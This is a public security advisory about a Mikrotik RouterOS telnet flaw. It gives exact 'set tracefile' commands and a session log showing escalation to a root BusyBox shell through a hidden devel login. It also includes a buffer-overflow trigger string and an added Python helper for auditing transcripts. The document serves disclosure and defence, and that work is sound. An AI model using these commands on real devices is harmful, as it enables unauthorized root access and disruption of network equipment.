Untitled

a guest Dec 14th, 2018
Mikrotik RouterOS telnet arbitrary root file creation 0day
==========================================================
This weakness occurs "post-authentication" and can be used to escape the
restricted shell on Mikrotik devices and escalate "readonly" privileges.
Mikrotik contains a hidden "devel" login option which can be enabled
through use of an "options" package.

An exploitable arbitrary file creation weakness has been identified in
Mikrotik RouterOS that can be leveraged by a malicious attacker against
all known versions of Mikrotik RouterOS. RouterOS contains a telnet
client based on GNU inetutils, modified to remove the shell subsystem.
However, an attacker can leverage the "set tracefile" option to write an
arbitrary file into any "rw" area of the filesystem, escaping the
restricted shell to gain access to an "ash" busybox shell on some versions.
The file is created with root privileges regardless of the RouterOS group
of the logged-in user.

On versions 4.10 to 5.26 an attacker can enable the "devel" login to escape
the restricted shell by creating the following file:

"set tracefile /nova/etc/devel-login"

On versions 6.0 to 6.40 the same can be achieved with the file:

"set tracefile /flash/nova/etc/devel-login"

This will allow access to an "ash" shell using the "devel" login, which has
the same password as the "admin" user. The advantage of this method over
known public methods is that it does not require reconfiguration of the
device via backup files, nor a system reboot.

On versions above 6.40 the "devel-login" check requires creation of an
"option" folder in a read-only partition, so this issue can no longer be
used to obtain a shell; it can still be exploited to overwrite files as
root, such as "user.db", from low-privileged user accounts in order to
disrupt operation of the device.

An example of exploitation on impacted devices is shown below:

[admin@MikroTik] > system telnet
address:
telnet> set tracefile /flash/nova/etc/devel-login
tracefile set to "/flash/nova/etc/devel-login".
telnet> quit

Welcome back!
[admin@MikroTik] > system telnet 127.0.0.1
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.

MikroTik v6.40.9 (bugfix)
Login: devel
Password:

BusyBox v1.00 (2018.08.20-07:26+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

#

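As an added example (not part of this advisory and not Hacker House tooling), the following Python audit helper maps a RouterOS login banner onto the version ranges given above and flags "set tracefile" commands in a captured telnet-client session that point at the devel-login files or at user.db. The only RouterOS facts it relies on are the ones stated in the advisory: the two devel-login paths, the affected version ranges and the "MikroTik vX.Y.Z" banner format. The session transcript embedded at the bottom is constructed for the example, and the user.db location in it is an assumed path.

```python
"""Audit helper for the RouterOS telnet "set tracefile" file-creation issue.

Added example for this page; it is not part of the advisory or of any
Hacker House tooling. Everything it knows about RouterOS comes from the
advisory text: the two devel-login paths, the affected version ranges and
the "MikroTik vX.Y.Z" banner format. The transcript at the bottom is
constructed for the example.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]

# The two files the advisory names as enabling the hidden "devel" login.
DEVEL_LOGIN_PATHS = ("/nova/etc/devel-login", "/flash/nova/etc/devel-login")

BANNER_RE = re.compile(r"MikroTik v(\d+)\.(\d+)(?:\.(\d+))?")
# A "set tracefile <path>" command typed at the telnet> prompt. The reply
# line 'tracefile set to "..."' starts with "tracefile" and does not match.
TRACEFILE_RE = re.compile(r"^\s*(?:telnet>\s*)?set\s+tracefile\s+(\S+)")


def parse_version(line: str) -> Optional[Version]:
    """Return (major, minor, patch) from a RouterOS login banner, else None."""
    m = BANNER_RE.search(line)
    if not m:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def classify(version: Version) -> Tuple[str, Optional[str]]:
    """Map a version onto the impact the advisory gives for its range.

    Returns (impact, path): path is the devel-login file to create for that
    range, or None where the advisory says only a root file overwrite remains.
    """
    mm = version[:2]
    if (4, 10) <= mm <= (5, 26):
        return "root shell via devel-login", DEVEL_LOGIN_PATHS[0]
    if (6, 0) <= mm <= (6, 40):
        return "root shell via devel-login", DEVEL_LOGIN_PATHS[1]
    if mm > (6, 40):
        return "root file overwrite only (devel-login needs a read-only partition)", None
    # Below 4.10: the advisory claims the root file write but names no shell escape.
    return "root file write; no shell escape described for this range", None


@dataclass
class Finding:
    line_no: int
    path: str
    severity: str
    reason: str


def scan_transcript(lines: List[str]) -> List[Finding]:
    """Flag every "set tracefile" command in a captured telnet-client session."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, 1):
        m = TRACEFILE_RE.match(line)
        if not m:
            continue
        path = m.group(1)
        if path in DEVEL_LOGIN_PATHS:
            findings.append(Finding(n, path, "critical", "enables hidden devel login (root shell)"))
        elif path.endswith("user.db"):
            findings.append(Finding(n, path, "high", "overwrites the user database as root"))
        else:
            findings.append(Finding(n, path, "medium", "arbitrary root file write via tracefile"))
    return findings


def audit(lines: List[str]):
    """Combine the banner-derived impact with the transcript findings."""
    version = next((v for v in map(parse_version, lines) if v), None)
    impact = classify(version) if version else ("unknown RouterOS version", None)
    return version, impact, scan_transcript(lines)


# Constructed session transcript (not a real capture). The user.db location
# is an assumed path; the advisory names only the file.
SAMPLE_TRANSCRIPT = [
    "MikroTik v6.40.9 (bugfix)",
    "[admin@MikroTik] > system telnet",
    "address:",
    "telnet> set tracefile /flash/nova/etc/devel-login",
    'tracefile set to "/flash/nova/etc/devel-login".',
    "telnet> quit",
    "[audit@MikroTik] > system telnet",
    "telnet> set tracefile /flash/rw/store/user.db",
    "telnet> set tracefile /rw/trace.log",
]

if __name__ == "__main__":
    version, (impact, path), findings = audit(SAMPLE_TRANSCRIPT)
    print(f"RouterOS {version}: {impact}" + (f" via {path}" if path else ""))
    for f in findings:
        print(f"line {f.line_no}: [{f.severity}] {f.path} - {f.reason}")
```

The scanner is meant for terminal transcripts or session recordings such as the one shown above; it keys on the command as typed at the telnet> prompt, so it reports the devel-login write on a 6.40.9 device as critical and a write to user.db on any version as high, while any other tracefile target is still reported because the file is created as root.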
Errata: an additional advisory accompanying this one references
multiple buffer overflow vulnerabilities in inetutils telnet clients.
The Mikrotik telnet client is also susceptible to these weaknesses. A
trigger for the overflow condition is shown below.

telnet> environ define DISPLAY AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
telnet> open 127.0.0.1
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.

telnet: buffer overflow, losing data, sorry
telnet: ring.cc: 143: int ringbuf::flush(): Assertion `top-bot > 0 && top-bot <= count' failed.

Welcome back!
[admin@MikroTik] >

-- Hacker Fantastic
11/12/2018

https://hacker.house

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/